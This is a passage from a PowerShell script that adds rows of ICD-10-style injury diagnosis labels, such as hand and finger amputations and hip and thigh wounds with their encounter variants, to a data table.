transphalangeal amputation of left index finger","Partial traumatic transphalangeal amputation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right middle finger","Partial traumatic transphalangeal amputation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right middle finger","Partial traumatic transphalangeal amputation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right middle finger","Partial traumatic transphalangeal amputation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left middle finger","Partial traumatic transphalangeal amputation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left middle finger","Partial traumatic transphalangeal amputation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left middle finger","Partial traumatic transphalangeal amputation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right ring finger","Partial traumatic transphalangeal amputation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right ring finger","Partial traumatic transphalangeal amputation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right ring finger","Partial traumatic transphalangeal amputation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left ring finger","Partial traumatic transphalangeal amputation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left ring finger","Partial traumatic transphalangeal amputation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left ring finger","Partial traumatic transphalangeal amputation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right little finger","Partial traumatic transphalangeal amputation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right little finger","Partial traumatic transphalangeal amputation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of right little finger","Partial traumatic transphalangeal amputation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left little finger","Partial traumatic transphalangeal amputation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left little finger","Partial traumatic transphalangeal amputation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of left little finger","Partial traumatic transphalangeal amputation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of other finger","Partial traumatic transphalangeal amputation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of other finger","Partial traumatic transphalangeal amputation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of other finger","Partial traumatic transphalangeal amputation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified finger","Partial traumatic transphalangeal amputation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified finger","Partial traumatic transphalangeal amputation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transphalangeal amputation of unspecified finger","Partial traumatic transphalangeal amputation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of right hand","Complete traumatic transmetacarpal amputation of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of right hand","Complete traumatic transmetacarpal amputation of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of right hand","Complete traumatic transmetacarpal amputation of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of left hand","Complete traumatic transmetacarpal amputation of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of left hand","Complete traumatic transmetacarpal amputation of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of left hand","Complete traumatic transmetacarpal amputation of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of unspecified hand","Complete traumatic transmetacarpal amputation of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of unspecified hand","Complete traumatic transmetacarpal amputation of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic transmetacarpal amputation of unspecified hand","Complete traumatic transmetacarpal amputation of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of right hand","Partial traumatic transmetacarpal amputation of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of right hand","Partial traumatic transmetacarpal amputation of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of right hand","Partial traumatic transmetacarpal amputation of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of left hand","Partial traumatic transmetacarpal amputation of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of left hand","Partial traumatic transmetacarpal amputation of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of left hand","Partial traumatic transmetacarpal amputation of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of unspecified hand","Partial traumatic transmetacarpal amputation of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of unspecified hand","Partial traumatic transmetacarpal amputation of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic transmetacarpal amputation of unspecified hand","Partial traumatic transmetacarpal amputation of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified wrist, hand and finger(s)","Other specified injuries of unspecified wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified wrist, hand and finger(s)","Other specified injuries of unspecified wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified wrist, hand and finger(s)","Other specified injuries of unspecified wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right wrist, hand and finger(s)","Other specified injuries of right wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right wrist, hand and finger(s)","Other specified injuries of right wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right wrist, hand and finger(s)","Other specified injuries of right wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left wrist, hand and finger(s)","Other specified injuries of left wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left wrist, hand and finger(s)","Other specified injuries of left wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left wrist, hand and finger(s)","Other specified injuries of left wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified wrist, hand and finger(s)","Unspecified injury of unspecified wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified wrist, hand and finger(s)","Unspecified injury of unspecified wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified wrist, hand and finger(s)","Unspecified injury of unspecified wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right wrist, hand and finger(s)","Unspecified injury of right wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right wrist, hand and finger(s)","Unspecified injury of right wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right wrist, hand and finger(s)","Unspecified injury of right wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left wrist, hand and finger(s)","Unspecified injury of left wrist, hand and finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left wrist, hand and finger(s)","Unspecified injury of left wrist, hand and finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left wrist, hand and finger(s)","Unspecified injury of left wrist, hand and finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hip","Contusion of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hip","Contusion of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hip","Contusion of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right hip","Contusion of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right hip","Contusion of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right hip","Contusion of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left hip","Contusion of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left hip","Contusion of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left hip","Contusion of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thigh","Contusion of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thigh","Contusion of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thigh","Contusion of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right thigh","Contusion of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thigh","Contusion of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thigh","Contusion of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left thigh","Contusion of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thigh","Contusion of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thigh","Contusion of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right hip","Abrasion, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right hip","Abrasion, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right hip","Abrasion, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left hip","Abrasion, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left hip","Abrasion, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left hip","Abrasion, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified hip","Abrasion, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified hip","Abrasion, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified hip","Abrasion, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right hip","Blister (nonthermal), right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right hip","Blister (nonthermal), right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right hip","Blister (nonthermal), right hip, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left hip","Blister (nonthermal), left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left hip","Blister (nonthermal), left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left hip","Blister (nonthermal), left hip, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified hip","Blister (nonthermal), unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified hip","Blister (nonthermal), unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified hip","Blister (nonthermal), unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right hip","External constriction, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right hip","External constriction, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right hip","External constriction, right hip, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left hip","External constriction, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left hip","External constriction, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left hip","External constriction, left hip, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified hip","External constriction, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified hip","External constriction, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified hip","External constriction, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right hip","Superficial foreign body, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right hip","Superficial foreign body, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right hip","Superficial foreign body, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left hip","Superficial foreign body, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left hip","Superficial foreign body, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left hip","Superficial foreign body, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified hip","Superficial foreign body, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified hip","Superficial foreign body, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified hip","Superficial foreign body, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right hip","Insect bite (nonvenomous), right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right hip","Insect bite (nonvenomous), right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right hip","Insect bite (nonvenomous), right hip, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left hip","Insect bite (nonvenomous), left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left hip","Insect bite (nonvenomous), left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left hip","Insect bite (nonvenomous), left hip, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified hip","Insect bite (nonvenomous), unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified hip","Insect bite (nonvenomous), unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified hip","Insect bite (nonvenomous), unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, right hip","Other superficial bite of hip, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, right hip","Other superficial bite of hip, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, right hip","Other superficial bite of hip, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, left hip","Other superficial bite of hip, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, left hip","Other superficial bite of hip, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, left hip","Other superficial bite of hip, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, unspecified hip","Other superficial bite of hip, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, unspecified hip","Other superficial bite of hip, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of hip, unspecified hip","Other superficial bite of hip, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right thigh","Abrasion, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right thigh","Abrasion, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right thigh","Abrasion, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left thigh","Abrasion, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left thigh","Abrasion, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left thigh","Abrasion, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified thigh","Abrasion, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified thigh","Abrasion, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified thigh","Abrasion, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right thigh","Blister (nonthermal), right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right thigh","Blister (nonthermal), right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right thigh","Blister (nonthermal), right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left thigh","Blister (nonthermal), left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left thigh","Blister (nonthermal), left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left thigh","Blister (nonthermal), left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified thigh","Blister (nonthermal), unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified thigh","Blister (nonthermal), unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified thigh","Blister (nonthermal), unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right thigh","External constriction, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right thigh","External constriction, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right thigh","External constriction, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left thigh","External constriction, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left thigh","External constriction, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left thigh","External constriction, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified thigh","External constriction, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified thigh","External constriction, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified thigh","External constriction, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right thigh","Superficial foreign body, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right thigh","Superficial foreign body, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right thigh","Superficial foreign body, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left thigh","Superficial foreign body, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left thigh","Superficial foreign body, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left thigh","Superficial foreign body, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified thigh","Superficial foreign body, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified thigh","Superficial foreign body, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified thigh","Superficial foreign body, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right thigh","Insect bite (nonvenomous), right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right thigh","Insect bite (nonvenomous), right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right thigh","Insect bite (nonvenomous), right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left thigh","Insect bite (nonvenomous), left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left thigh","Insect bite (nonvenomous), left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left thigh","Insect bite (nonvenomous), left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified thigh","Insect bite (nonvenomous), unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified thigh","Insect bite (nonvenomous), unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified thigh","Insect bite (nonvenomous), unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thigh","Other superficial bite of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thigh","Other superficial bite of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thigh","Other superficial bite of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thigh","Other superficial bite of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thigh","Other superficial bite of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thigh","Other superficial bite of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thigh","Other superficial bite of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thigh","Other superficial bite of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thigh","Other superficial bite of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hip","Unspecified superficial injury of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hip","Unspecified superficial injury of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hip","Unspecified superficial injury of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hip","Unspecified superficial injury of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hip","Unspecified superficial injury of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hip","Unspecified superficial injury of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hip","Unspecified superficial injury of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hip","Unspecified superficial injury of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hip","Unspecified superficial injury of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thigh","Unspecified superficial injury of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thigh","Unspecified superficial injury of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thigh","Unspecified superficial injury of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thigh","Unspecified superficial injury of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thigh","Unspecified superficial injury of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thigh","Unspecified superficial injury of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thigh","Unspecified superficial injury of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thigh","Unspecified superficial injury of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thigh","Unspecified superficial injury of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right hip","Unspecified open wound, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right hip","Unspecified open wound, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right hip","Unspecified open wound, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left hip","Unspecified open wound, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left hip","Unspecified open wound, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left hip","Unspecified open wound, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified hip","Unspecified open wound, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified hip","Unspecified open wound, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified hip","Unspecified open wound, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right hip","Laceration without foreign body, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right hip","Laceration without foreign body, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right hip","Laceration without foreign body, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left hip","Laceration without foreign body, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left hip","Laceration without foreign body, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left hip","Laceration without foreign body, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified hip","Laceration without foreign body, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified hip","Laceration without foreign body, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified hip","Laceration without foreign body, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right hip","Laceration with foreign body, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right hip","Laceration with foreign body, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right hip","Laceration with foreign body, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left hip","Laceration with foreign body, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left hip","Laceration with foreign body, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left hip","Laceration with foreign body, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified hip","Laceration with foreign body, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified hip","Laceration with foreign body, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified hip","Laceration with foreign body, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right hip","Puncture wound without foreign body, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right hip","Puncture wound without foreign body, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right hip","Puncture wound without foreign body, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left hip","Puncture wound without foreign body, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left hip","Puncture wound without foreign body, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left hip","Puncture wound without foreign body, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified hip","Puncture wound without foreign body, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified hip","Puncture wound without foreign body, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified hip","Puncture wound without foreign body, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right hip","Puncture wound with foreign body, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right hip","Puncture wound with foreign body, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right hip","Puncture wound with foreign body, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left hip","Puncture wound with foreign body, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left hip","Puncture wound with foreign body, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left hip","Puncture wound with foreign body, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified hip","Puncture wound with foreign body, unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified hip","Puncture wound with foreign body, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified hip","Puncture wound with foreign body, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right hip","Open bite, right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right hip","Open bite, right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right hip","Open bite, right hip, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left hip","Open bite, left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left hip","Open bite, left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left hip","Open bite, left hip, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified hip","Open bite, unspecified 